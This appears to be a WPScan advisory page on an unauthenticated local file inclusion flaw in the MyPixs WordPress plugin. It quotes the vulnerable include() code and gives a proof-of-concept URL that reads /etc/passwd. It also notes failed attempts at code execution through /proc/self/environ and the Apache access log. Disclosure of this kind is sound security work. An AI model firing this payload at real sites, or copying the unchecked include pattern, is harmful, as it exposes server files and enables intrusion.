MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Typical local file inclusion vulnerability:

from downloadpage.php:
<?php
 $url = $_REQUEST["url"];
 if ($url != "") {
  include($url);
 }
?>

I've tried to get RCE but didn't have success reading from /proc/self/environ or /var/log/apache2/access.log

include(): Failed opening '/proc/self/environ' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /usr/share/wordpress/wp-content/plugins/mypixs/mypixs/downloadpage.php on line 4
Proof of Concept
http://www.example.com/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd

Affects

Plugin mypixs

References

URL http://www.vapid.dhs.org/advisory.php?v=154

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapid.dhs.org
Submitter Twitter _larry0
Views 172
Verified No
WPVDB ID 8191

Timeline

Publicly Published 2015-09-15 (about 1 year ago)
Added 2015-09-18 (about 1 year ago)
Last Updated 2015-09-18 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.